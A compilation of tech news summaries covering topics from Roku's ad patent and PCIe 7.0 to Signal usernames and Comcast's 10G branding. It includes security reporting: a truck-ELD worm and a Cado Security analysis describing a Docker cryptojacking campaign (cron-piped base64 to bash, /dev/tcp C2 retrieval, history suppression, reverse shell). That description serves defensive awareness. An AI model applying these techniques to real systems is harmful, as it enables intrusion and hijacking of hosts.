An anonymous reader quotes a report from Kotaku: A new patent recently filed by TV and streaming device manufacturer Roku hints toward a possible future where televisions could display ads when you pause a movie or game. For Roku, the time in which the TV is on but users aren't doing anything is valuable. The company has started leasing out ad space in its popular Roku City screensaver -- which appears when your TV is idle -- to companies like McDonald's and movies like Barbie. As tech newsletter Lowpass points out, Roku finds this idle time and its screensaver so valuable that it forbids app developers from overriding the screensaver with their own. But, if you plug in an Xbox or DVD player into the HDMI port on a Roku TV, you bypass the company's screensaver and other ads. And so, Roku has been figuring out a way to not let that happen.

As reported by Lowpass on April 4, Roku recently filed a patent for a technology that would let it inject ads into third-party content -- like an Xbox game or Netflix movie -- using an HDMI connection. The patent describes a situation where you are playing a video game and hit pause to go check your phone or grab some food. At this point, Roku would identify that you have paused the content and display a relevant ad until you unpaused the game. Roku's tech isn't designed to randomly inject ads as you are playing a game or watching a movie, it knows that would be going too far and anger people. Instead, the patent suggests several ways that Roku could spot when your TV is paused, like comparing frames, to make sure the user has actually paused the content. Roku might also use the HDMI's audio feed to search for extended moments of silence. The company also proposes using HDMI CEC -- a protocol designed to help devices communicate better -- to figure out when you pause and unpause content. Similarly, Roku's patent explains that it will use various methods to detect what people are playing or watching and try to display relevant ads. So if it sees you have an Xbox plugged in, it might try to serve you ads that it thinks an Xbox owner would be interested in.

An anonymous reader shares a PC Gamer report: PCI Express 7.0 is coming. But don't feel as though you need to start saving for a new motherboard anytime soon. The PCI-SIG has just released the 0.5 version, with the final version set for release in 2025. That means supporting devices are not likely to land until 2026, with 2027-28 likely to be the years we see a wider rollout. PCIe 7.0 will initially be far more relevant to the enterprise market, where bandwidth-hungry applications like AI and networking will benefit. Anyway, it's not like the PC market is saturated with PCIe 5.0 devices, and PCIe 6.0 is yet to make its way into our gaming PCs.

PCI Express bandwidth doubles every generation, so PCIe 7.0 will deliver a maximum data rate up to 128 GT/s. That's a whopping 8x faster than PCIe 4.0 and 4x faster than PCIe 5.0. This means PCIe 7.0 is capable of delivering up to 512GB/s of bi-directional throughput via a x16 connection and 128GB/s for an x4 connection. More bandwidth will certainly be beneficial for CPU to chipset links, which means multiple integrated devices like 10G networking, WiFi 7, USB 4, and Thunderbolt 4 will all be able to run on a consumer motherboard without compromise. And just imagine what all that bandwidth could mean for PCIe 7.0 SSDs. In the years to come, a PCIe 7.0 x4 SSD could approach sequential transfer rates of up to 60GB/s. We'll need some serious advances in SSD controller and NAND flash technologies to see speeds in that range, but still, it's an attractive proposition. Further reading: PCIe 7.0 first official draft lands, doubling bandwidth yet again.

An anonymous reader quotes a report from Popular Science: In the average American house, any download rate above roughly 242 Mbs is considered a solidly speedy broadband internet connection. That's pretty decent, but across the Atlantic, researchers at UK's Aston University recently managed to coax about 1.2 million times that rate using a single fiber optic cable -- a new record for specific wavelength bands. As spotted earlier today by Gizmodo, the international team achieved a data transfer rate of 301 terabits, or 301,000,000 megabits per second by accessing new wavelength bands normally unreachable in existing optical fibers -- the tiny, hollow glass strands that carry data through beams of light. According to Aston University's recent profile, you can think of these different wavelength bands as different colors of light shooting through a (largely) standard cable.

Commercially available fiber cabling utilizes what are known as C- and L-bands to transmit data. By constructing a device called an optical processor, however, researchers could access the never-before-used E- and S-bands. "Over the last few years Aston University has been developing optical amplifiers that operate in the E-band, which sits adjacent to the C-band in the electromagnetic spectrum but is about three times wider," Ian Phillips, the optical processor's creator, said in a statement. "Before the development of our device, no one had been able to properly emulate the E-band channels in a controlled way." But in terms of new tech, the processor was basically it for the team's experiment. "Broadly speaking, data was sent via an optical fiber like a home or office internet connection," Phillips added. What's particularly impressive and promising about the team's achievement is that they didn't need new, high-tech fiber optic lines to reach such blindingly fast speeds. Most existing optical cables have always technically been capable of reaching E- and S-bands, but lacked the equipment infrastructure to do so. With further refinement and scaling, internet providers could ramp up standard speeds without overhauling current fiber optic infrastructures.

A CNN opinion piece looks at "the moaning about manual transmission's demise," noting that "it's not just Europeans (literally) clinging on. In the U.S., there's apparently a young (also predominantly male) demographic that is embracing manual driving — championing it as retro, much like Gen Z's affinity to typewriters and vintage cameras.

"They feel there's something authentic about it: a connection between driver and vehicle that automatization cuts out." But CNN's writer argues the case against stick shifts... [Automatic vehicles] chalk up better mileage and drive faster than their stick-shift counterparts. The explanation: automatics select the right gear for the vehicle, usually the highest gear possible. The average manual driver is not always so proficient. In getting the gear right, automatics consume less fuel, save money and emit fewer emissions.

These are among the reasons why it's ever harder to buy a new manual-transmission model of any kind in many countries. In the US, less than 1% of new models have stick shifts (compared to 35% in 1980), according to the Environmental Protection Agency. It's really only sports cars, off-road truck SUVs and a handful of small pickups that still have clutches.... While all gasoline-run cars and trucks are climate killers with stick shifts being the slightly worse of two evils, combustion-engine automatics themselves are on their way out. They are tooling along the highway side-by-side with their stick-and-clutch counterparts toward the junkyard of history. Electric vehicles have gear systems, too: a single speed transmission that transmits energy from the motor to the wheels. But because only one gear exists, there is no switching of gears, neither automatically nor manually...

Road transportation accounts for 15% of the world's greenhouse gas emissions, according to Our World Data, as well as being a huge contributor to the air pollution that claims around nine million deaths a year from respiratory and lung diseases. Transportation noise, though less deadly, also contributes to stress and sleep disorders. Thankfully, there's a convenient way to circumvent these blights: electric vehicles...

But for those aficionados who really can't go without a clutch and gear shifter, Toyota is planning a realistic-feeling fake manual transmission for some EV models. It serves no purpose whatsoever — save to comfort bruised egos.

The Baffler says a new publishing house launched earlier this month "brings Silicon Valley-style startup disruption to the business of books."

Authors Equity has "a tiny core staff, offloading its labor to a network of freelancers," and like a handful of other publishers "is upending the way that authors get paid, eschewing advances and offering a higher percentage of profits instead." It is worth watching because its team includes several of the most important publishing people of the twenty-first century. And if it works, it will offer a model for tightening the connection between book culture and capitalism, a leap forward for the forces of efficiency and the fantasies of frictionless markets, ushering in a world where literature succeeds if and only if it sells....

Authors Equity's website presents its vision in strikingly neoliberal corporatespeak. The company has four Core Principles: Aligned Incentives; Bespoke Teams; Flexibility and Transparency; and Long-Term Collaboration. What do they mean by these MBA keywords? Aligned Incentives is explained in the language of human capital: "Our profit-share model rewards authors who want to bet on themselves." Authors, that is, take on more of the financial risk of publication. At a traditional publishing house, advances provide authors with guaranteed cash early in the process that they can use to live off while writing. With Authors Equity, nothing is guaranteed and nothing given ahead of time; an author's pay depends on their book's profits.

In an added twist, "Profit participation is also an option for key members of the book team, so we're in a position to win together." Typically, only an author's agent's income is directly tied to an author's financial success, but at Authors Equity, others could have a stake. This has huge consequences for the logic of literary production. If an editor, for example, receives a salary and not a cut of their books' profits, their incentives are less immediately about profit, offering more wiggle room for aesthetic value. The more the people working on books participate in their profits, the more, structurally, profit-seeking will shape what books look like.

"Bespoke Teams" is a euphemism for gigification. With a tiny initial staff of six, Authors Equity uses freelance workers to make books, unlike traditional publishers, which have many employees in many departments... Their fourth Core Principle — Long-Term Collaboration — addresses widespread frustration with a systemic problem in traditional publishing: the fetishization of debut authors who receive decent or better advances, fail to earn out, and then struggle to have a career. It's a real problem and one where authors' interests and capitalist rationalization are, as it were, aligned. Authors Equity sees that everyone might profit when an author can build a readership and develop their skill.
The article concludes with this prediction. "It's not impossible that we'll look back in twenty years and see its founding as auguring the beginning of the startup age in publishing."

Food for thought... Pulp-fiction mystery writer Mickey Spillane once said, "I'm a writer, not an author. The difference is, a writer makes money."

Jessica Lyons reports via The Register: Vulnerabilities in common Electronic Logging Devices (ELDs) required in US commercial trucks could be present in over 14 million medium- and heavy-duty rigs, according to boffins at Colorado State University. In a paper presented at the 2024 Network and Distributed System Security Symposium, associate professor Jeremy Daily and systems engineering graduate students Jake Jepson and Rik Chatterjee demonstrated how ELDs can be accessed over Bluetooth or Wi-Fi connections to take control of a truck, manipulate data, and spread malware between vehicles. "These findings highlight an urgent need to improve the security posture in ELD systems," the trio wrote [PDF].

The authors did not specify brands or models of ELDs that are vulnerable to the security flaws they highlight in the paper. But they do note there's not too much diversity of products on the market. While there are some 880 devices registered, "only a few tens of distinct ELD models" have hit the road in commercial trucks. A federal mandate requires most heavy-duty trucks to be equipped with ELDs, which track driving hours. These systems also log data on engine operation, vehicle movement and distances driven -- but they aren't required to have tested safety controls built in. And according to the researchers, they can be wirelessly manipulated by another car on the road to, for example, force a truck to pull over.

The academics pointed out three vulnerabilities in ELDs. They used bench level testing systems for the demo, as well as additional testing on a moving 2014 Kenworth T270 Class 6 research truck equipped with a vulnerable ELD. [...] For one of the attacks, the boffins showed how anyone within wireless range could use the device's Wi-Fi and Bluetooth radios to send an arbitrary CAN message that could disrupt of some of the vehicle's systems. A second attack scenario, which also required the attacker to be within wireless range, involved connecting to the device and uploading malicious firmware to manipulate data and vehicle operations. Finally, in what the authors described as the "most concerning" scenario, they uploaded a truck-to-truck worm. The worm uses the compromised device's Wi-Fi capabilities to search for other vulnerable ELDs nearby. After finding the right ELDs, the worm uses default credentials to establish a connection, drops its malicious code on the next ELD, overwrites existing firmware, and then starts the process over again, scanning for additional devices. "Such an attack could lead to widespread disruptions in commercial fleets, with severe safety and operational implications," the researchers warned.

An anonymous reader quotes a report from KrebsOnSecurity: The nonprofit organization that supports the Firefox web browser said today it is winding down its new partnership with Onerep, an identity protection service recently bundled with Firefox that offers to remove users from hundreds of people-search sites. The move comes just days after a report by KrebsOnSecurity forced Onerep's CEO to admit that he has founded dozens of people-search networks over the years. Mozilla only began bundling Onerep in Firefox last month, when it announced the reputation service would be offered on a subscription basis as part of Mozilla Monitor Plus. Launched in 2018 under the name Firefox Monitor, Mozilla Monitor also checks data from the website Have I Been Pwned? to let users know when their email addresses or password are leaked in data breaches. On March 14, KrebsOnSecurity published a story showing that Onerep's Belarusian CEO and founder Dimitiri Shelest launched dozens of people-search services since 2010, including a still-active data broker called Nuwber that sells background reports on people. Onerep and Shelest did not respond to requests for comment on that story.

But on March 21, Shelest released a lengthy statement wherein he admitted to maintaining an ownership stake in Nuwber, a consumer data broker he founded in 2015 -- around the same time he launched Onerep. Shelest maintained that Nuwber has "zero cross-over or information-sharing with Onerep," and said any other old domains that may be found and associated with his name are no longer being operated by him. "I get it," Shelest wrote. "My affiliation with a people search business may look odd from the outside. In truth, if I hadn't taken that initial path with a deep dive into how people search sites work, Onerep wouldn't have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I'm aiming to do better in the future." The full statement is available here (PDF).

In a statement released today, a spokesperson for Mozilla said it was moving away from Onerep as a service provider in its Monitor Plus product. "Though customer data was never at risk, the outside financial interests and activities of Onerep's CEO do not align with our values," Mozilla wrote. "We're working now to solidify a transition plan that will provide customers with a seamless experience and will continue to put their interests first." KrebsOnSecurity also reported that Shelest's email address was used circa 2010 by an affiliate of Spamit, a Russian-language organization that paid people to aggressively promote websites hawking male enhancement drugs and generic pharmaceuticals. As noted in the March 14 story, this connection was confirmed by research from multiple graduate students at my alma mater George Mason University.

Shelest denied ever being associated with Spamit. "Between 2010 and 2014, we put up some web pages and optimize them -- a widely used SEO practice -- and then ran AdSense banners on them," Shelest said, presumably referring to the dozens of people-search domains KrebsOnSecurity found were connected to his email addresses (dmitrcox@gmail.com and dmitrcox2@gmail.com). "As we progressed and learned more, we saw that a lot of the inquiries coming in were for people." Shelest also acknowledged that Onerep pays to run ads on "on a handful of data broker sites in very specific circumstances." "Our ad is served once someone has manually completed an opt-out form on their own," Shelest wrote. "The goal is to let them know that if they were exposed on that site, there may be others, and bring awareness to there being a more automated opt-out option, such as Onerep."

An Internet service provider that admitted lying to the FCC about where it offers broadband will pay a $10,000 fine and implement a compliance plan to prevent future violations. ArsTechnica: Jefferson County Cable (JCC), a small ISP in Toronto, Ohio, admitted that it falsely claimed to offer fiber service in an area that it hadn't expanded to yet. A company executive also admitted that the firm submitted false coverage data to prevent other ISPs from obtaining government grants to serve the area. Ars helped expose the incident in a February 2023 article.

The FCC announced the outcome of its investigation on March 15, saying that Jefferson County Cable violated the Broadband Data Collection program requirements and the Broadband DATA Act, a US law, "in connection with reporting inaccurate information or data with respect to the Company's ability to provide broadband Internet access service." The FCC said: "To settle this matter, Jefferson County Cable agrees to pay a $10,000 civil penalty to the United States Treasury. Jefferson County Cable also agrees to implement enhanced compliance measures. This action will help further the Commission's efforts to bridge the digital divide by having accurate data of locations where broadband service is available."

Google's second developer preview for Android 15 has arrived, bringing long-awaited support for satellite connectivity alongside several improvements to contactless payments, multi-language recognition, volume consistency, and interaction with PDFs via apps. From a report: These developer-focused betas are a proving ground for features that will likely make it into the final public release scheduled for later this year. According to Google, public beta releases should be available to test between April and July. The latest developer preview addresses some nuisances and security concerns experienced by Android users, such as making apps more aware of why some services might be unavailable when devices are using a satellite connection. This is also the first official confirmation that Android 15 will come with satellite messaging, with Google's press release saying that the new preview includes support for "preloaded RCS applications to use satellite connectivity for sending and receiving messages."

An anonymous reader quotes a report from Ars Technica: Google closed its Fitbit acquisition in 2021. Since then, the tech behemoth has pushed numerous changes to the wearable brand, including upcoming updates announced this week. While Google reshapes its fitness tracker business, though, some long-time users are regretting their Fitbit purchases and questioning if Google's practices will force them to purchase their next fitness tracker elsewhere.

As is becoming common practice with consumer tech announcements of late, Google's latest announcements about Fitbit seemed to be trying to convince users of the wonders of generative AI and how that will change their gadgets for the better. In a blog post yesterday, Dr. Karen DeSalvo, Google's chief health officer, announced that Fitbit Premium subscribers would be able to test experimental AI features later this year (Google hasn't specified when). "You will be able to ask questions in a natural way and create charts just for you to help you understand your own data better. For example, you could dig deeper into how many active zone minutes... you get and the correlation with how restorative your sleep is," she wrote. DeSalvo's post included an example of a user asking a chatbot if there was a connection between their sleep and activity and said that the experimental AI features will only be available to "a limited number of Android users who are enrolled in the Fitbit Labs program in the Fitbit mobile app."

Fitbit is also working with the Google Research team and "health and wellness experts, doctors, and certified coaches" to develop a large language model (LLM) for upcoming Fitbit mobile app features that pull data from Fitbit and Pixel devices, DeSalvo said. In a blog post yesterday, Yossi Matias, VP of engineering and research at Google, said Google wants to use the LLM to add personalized coaching features, such as the ability to look for sleep irregularities and suggest actions "on how you might change the intensity of your workout." Google's Fitbit is building the LLM on Gemini models that are tweaked on de-identified data from unspecified "research case studies," Matias said, adding: "For example, we're testing performance using sleep medicine certification exam-like practice tests." Other recent changes to Fitbit include a name tweak from Fitbit by Google, to Google Fitbit, as spotted by 9to5Google this week. Charge 5 users are especially concerned after users noticed their devices suddenly stopped holding a charge after a December firmware update was pushed. The problem has persisted with Google offering no solution other than offer discounts or, if the device was within its warranty period, a replacement.

"This is called planned obsolescence. I'll be upgrading to a watch style tracker from a different company. I wish Fitbit hadn't sold out to Google," a forum user going by Sean77024 wrote on Fitbit's support forum yesterday. "Others, like 2MeFamilyFlyer, have also accused Fitbit of planning Charge 5 obsolescence," notes Ars. "2MeFamilyFlyer said they're seeking a Fitbit alternative."

In 1995 Scottish video game designer Chris Sawyer created the business simulator game Transport Tycoon Deluxe — and within four years, Wikipedia notes, work began on the first version of an open source version that's still being actively developed. "According to a study of the 61,154 open-source projects on SourceForge in the period between 1999 and 2005, OpenTTD ranked as the 8th most active open-source project to receive patches and contributions. In 2004, development moved to their own server."

Long-time Slashdot reader orudge says he's been involved for almost 25 years. "Exactly 21 years ago, I received an ICQ message (look it up, kids) out of the blue from a guy named Ludvig Strigeus (nicknamed Ludde)." "Hello, you probably don't know me, but I've been working on a project to clone Transport Tycoon Deluxe for a while," he said, more or less... Ludde made more progress with the project [written in C] over the coming year, and it looks like we even attempted some multiplayer games (not too reliable, especially over my dial-up connection at the time). Eventually, when he was happy with what he had created, he agreed to allow me to release the game as open source. Coincidentally, this happened exactly a year after I'd first spoken to him, on the 6th March 2004...

Things really got going after this, and a community started to form with enthusiastic developers fixing bugs, adding in new features, and smoothing off the rough edges. Ludde was, I think, a bit taken aback by how popular it proved, and even rejoined the development effort for a while. A read through the old changelogs reveals just how many features were added over a very short period of time. Quick wins like higher vehicle limits came in very quickly, and support for TTDPatch's NewGRF format started to be functional just four months later. Large maps, improved multiplayer, better pathfinders, improved TTDPatch compatibility, and of course, ports to a great many different operating systems, such as Mac OS X, BeOS, MorphOS and OS/2. It was a very exciting time to be a TTD fan!

Within six years, ambitious projects to create free replacements for the original TTD graphics, sounds and music sets were complete, and OpenTTD finally had its 1.0 release. And while we may not have the same frantic addition of new features we had in 2004, there have still been massive improvements to the code, with plenty of exciting new features over the years, with major releases every year since 2008. he move to GitHub in 2018 and the release of OpenTTD on Steam in 2021 have also re-energised development efforts, with thousands of people now enjoying playing the game regularly. And development shows no signs of slowing down, with the upcoming OpenTTD 14.0 release including over 40 new features!
"Personally, I would like to say thank you to everyone who has supported OpenTTD development over the past two decades..." they write, adding "Finally, of course, I'd like to thank you, the players! None of us would be here if people weren't still playing the game.

"Seeing how the first twenty years have gone, I can't wait to see what the next twenty years have in store. :)"

Researchers at Cado Security Labs received an alert about a honeypot using the Docker Engine API. "A Docker command was received..." they write, "that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server's root directory..." Typically, this is exploited to write out a job for the Cron scheduler to execute... In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker's Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilise the vurl executable to retrieve the first stage payload from the C2 server... To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh
"Multiple user mode rootkits are deployed to hide malicious processes," they note. And one of the shell scripts "makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker's session from being appended to the history file... Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn't appear in the shell history once a new session has been spawned."

The same script also inserts "an attacker-controlled SSH key to maintain access to the compromised host," according to the article, retrieves a miner for the Monero cryptocurrency and then "registers persistence in the form of systemd services" for both the miner and an open source Golang reverse shell utility named Platypus.

It also delivers "various utilities," according to the blog Security Week, "including 'masscan' for host discovery." Citing CADO's researchers, they write that the shell script also "weakens the machine by disabling SELinux and other functions and by uninstalling monitoring agents." The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet... ["For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host," the researchers writes.]

"This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers," Cado notes. "It's clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments."

Longtime Slashdot reader SonicSpike shares a report from The Intercept: With the new version of Signal, you will no longer broadcast your phone number to everyone you send messages to by default, though you can choose to if you want. Your phone number will still be displayed to contacts who already have it stored in their phones. Going forward, however, when you start a new conversation on Signal, your number won't be shared at all: Contacts will just see the name you use when you set up your Signal profile. So even if your contact is using a custom Signal client, for example, they still won't be able to discover your phone number since the service will never tell it to them.

You also now have the option to set a username, which Signal lets you change whenever you want and delete when you don't want it anymore. Rather than directly storing your username as part of your account details, Signal stores a cryptographic hash of your username instead; Signal uses the Ristretto 25519 hashing algorithm, essentially storing a random block of data instead of usernames themselves. This is like how online services can confirm a user's password is valid without storing a copy of the actual password itself. "As far as we're aware, we're the only messaging platform that now has support for usernames that doesn't know everyone's usernames by default," said Josh Lund, a senior technologist at Signal. The move is yet another piece of the Signal ethos to keep as little data on hand as it can, lest the authorities try to intrude on the company. Whittaker explained, "We don't want to be forced to enumerate a directory of usernames." [...]

If Signal receives a subpoena demanding that they hand over all account data related to a user with a specific username that is currently active at the time that Signal looks it up, they would be able to link it to an account. That means Signal would turn over that user's phone number, along with the account creation date and the last connection date. Whittaker stressed that this is "a pretty narrow pipeline that is guarded viciously by ACLU lawyers," just to obtain a phone number based on a username. Signal, though, can't confirm how long a given username has been in use, how many other accounts have used it in the past, or anything else about it. If the Signal user briefly used a username and then deleted it, Signal wouldn't even be able to confirm that it was ever in use to begin with, much less which accounts had used it before.

In short, if you're worried about Signal handing over your phone number to law enforcement based on your username, you should only set a username when you want someone to contact you, and then delete it afterward. And each time, always set a different username. Likewise, if you want someone to contact you securely, you can send them your Signal link, and, as soon as they make contact, you can reset the link. If Signal receives a subpoena based on a link that was already reset, it will be impossible for them to look up which account it was associated with. If the subpoena demands that Signal turn over account information based on a phone number, rather than a username, Signal could be forced to hand over the cryptographic hash of the account's username, if a username is set. It would be difficult, however, for law enforcement to learn the actual username itself based on its hash. If they already suspect a username, they could use the hash to confirm that it's real. Otherwise, they would have to guess the username using password cracking techniques like dictionary attacks or rainbow tables.

Piracy was traditionally seen as something that predominantly young males were interested in. This is a largely outdated representation of reality, as girls and women began to catch up a long time ago. In some countries, including Indonesia, more women pirate music, movies, and TV-shows than their male counterparts. TorrentFreak reports: [N]ew findings published by researchers from Northumbria University Newcastle, which include gender, are worth highlighting. The survey data, looking at piracy trends in Thailand and Indonesia, was released by Marketing professor Dr. Xuemei Bian and Ms. Humaira Farid. The results were presented to WIPO's Advisory Committee on Enforcement recently and the associated presentation (PDF) was published online. Through an online survey and in-person interviews, the research aims to map consumer attitudes and behaviors in Indonesia and Thailand, particularly in connection with online copyright infringement.

One of the overall conclusions is that piracy remains a common activity in both Asian countries. Pirates are present in all age groups but and music, movies en TV-shows tend to be in highest demand and younger people. Those under 40, are more likely to pirate than their older counterparts. These findings are not out of the ordinary and the same trends are visible in other countries too. Interestingly, however, some notable differences between the two countries appear when gender is added to the mix. The tables below show that women are more likely to pirate than men in Indonesia. This is true for all content categories, except for software, where men are slightly in the lead. In Thailand, however, men are more likely to pirate across all categories. The researchers do not attempt to explain these differences. However, they show once again that 'dated' gender stereotypes don't always match with reality. And when they have little explanatory value, one can question whether gender is even relevant in a piracy context.

Looking at other differences between Thai and Indonesian consumers there are some other notable findings. For example, in Indonesia, 64% of the respondents say they're aware of the availability of pirated movies and TV-shows on YouTube, compared to 'just' 32% in Thailand. Indonesian consumers are also more familiar with music piracy sites and pirate much more frequently than Thai consumers, as the table below shows. Finally, the researchers also looked at various attitudes toward piracy. This shows that Thai pirates would be most likely to stop if legal services were more convenient, while Indonesian pirates see cheaper legal services as the largest discouraging factor.

An anonymous reader shares a report: Google is introducing improvements to search suggestions in Chrome, the company announced today. As part of the changes, users will start to get more helpful search suggestions in Chrome based on what others are searching for, see more images for suggested searches and find search suggestions even with a poor connection.

Search suggestions are the drop-down list of suggested completions that appear before you finish typing out your query in Google. The feature generates predictions to help users save time and speed up their search. With these new updates, Google is expanding the availability of search suggestions and using them to boost inspiration. When users are signed into Chrome on desktop and open a new tab, they will now start to see suggestions in the search box related to their previous searches based on what other people are searching for.

New York Gov. Kathy Hochul is proposing legislation that would criminalize some deceptive and abusive uses of AI and require disclosure of AI in election campaign materials, her office told Axios. From the report: Hochul's proposed laws include establishing the crime of "unlawful dissemination or publication of a fabricated photographic, videographic, or audio record." Making unauthorized uses of a person's voice "in connection with advertising or trade" a misdemeanor offense. Such offenses are punishable by up to one year jail sentence. Expanding New York's penal law to include unauthorized uses of artificial intelligence in coercion, criminal impersonation and identity theft.

Amending existing intimate images and revenge porn statutes to include "digital images" -- ranging from realistic Photoshop-produced work to advanced AI-generated content. Codifying the right to sue over digitally manipulated false images. Requiring disclosures of AI use in all forms of political communication "including video recording, motion picture, film, audio recording, electronic image, photograph, text, or any technological representation of speech or conduct" within 60 days of an election.

"My goal is to have a firewall that I trust," writes Slashdot reader eggegick, "not a firewall that comes from the manufacture that might have back doors." I'm looking for a cheap mini PC I can turn into a headless Linux-based wireless and Ethernet router. The setup would be a cable modem on the Comcast side, Ethernet out from the modem to the router and Ethernet, and WiFi out to the home network.
Two long-time Slashdot readers had suggestions. johnnys believes "any old desktop or even a laptop will work.... as long as you have a way to get a couple of (fast or Gigabit) Ethernet ports and a good WiFi adapter... " Cable or any consumer-grade broadband doesn't need exotic levels of throughput: Gigabit Ethernet will not be saturated by any such connection...

You can also look at putting FOSS firewall software like DD-WRT or OpenWrt on consumer-grade "routers". Such hardware is usually set up with the right hardware and capabilities you are looking for. Note however that newer hardware may not work with such firmwares as the FCC rules about controlling RF have caused many manufacturers to lock down firmware images.

And you don't necessarily need to roll your own with iptables: There are several BSD or Linux-based FOSS distributions that do good firewall functionality. PFSense is very good and user-friendly, and there are others. OpenBSD provides an exceptionally capable enterprise-level firewall on a secure platform, but it's not designed to be user-friendly.
Long-time Slashdot reader Spazmania agrees the "best bet" is "one of those generic home wifi routers that are supported by DD-WRT or OpenWrt." It's not uncommon to find something used for $10-$20. And then install one or the other, giving a Linux box with full control. Add a USB stick so you have enough space for all the utilities.

I just went through the search for mini-PCs for a project at work. The main problem is that almost all of them cool poorly, and that significantly impairs their life span.I finally found a few at the $100 price point that cooled acceptably... and they disappeared from the market shortly after I bought the test units, replaced with newer models in the $250 ballpark.
Share your own thoughts and experiences in the comments.

Can you roll your own home router?

An anonymous reader quotes a report from Ars Technica: Comcast has reluctantly agreed to discontinue its "Xfinity 10G Network" brand name after losing an appeal of a ruling that found the marketing term was misleading. It will keep using the term 10G in other ways, however. Verizon and T-Mobile both challenged Comcast's advertising of 10G, a term used by cable companies since it was unveiled in January 2019 by industry lobby group NCTA-The Internet & Television Association. We wrote in 2019 that the cable industry's 10G marketing was likely to confuse consumers and seemed to be a way of countering 5G hype generated by wireless companies.

10G doesn't refer to the 10th generation of a technology. It is a reference to potential 10Gbps broadband connections, which would be much faster than the actual speeds on standard cable networks today. The challenges lodged against Comcast marketing were filed with the advertising industry's self-regulatory system run by BBB National Programs. BBB's National Advertising Division (NAD) ruled against Comcast in October 2023, but Comcast appealed to the National Advertising Review Board (NARB). The NARB announced its ruling today, agreeing with the NAD that "Comcast should discontinue use of the term 10G, both when used in the name of the service itself ('Xfinity 10G Network') as well as when used to describe the Xfinity network. The use of 10G in a manner that is not false or misleading and is consistent with the panel decision is not precluded by the panel recommendations."

Comcast agreed to make the change in an advertiser's statement that it provided to the NARB. "Although Comcast strongly disagrees with NARB's analysis and approach, Comcast will discontinue use of the brand name 'Xfinity 10G Network' and will not use the term '10G' in a manner that misleadingly describes the Xfinity network itself," Comcast said. Comcast said it disagrees with "the recommendation to discontinue the brand name" because the company "makes available 10Gbps of Internet speed to 98 percent of its subscribers upon request." But those 10Gbps speeds aren't available in Comcast's typical service plans and require a fiber-to-the-home connection instead of a standard cable installation. Comcast said it may still use 10G in ways that are less likely to confuse consumers. "Consistent with the panel's recommendation... Comcast reserves the right to use the term '10G' or 'Xfinity 10G' in a manner that does not misleadingly describe the Xfinity network itself," the company said.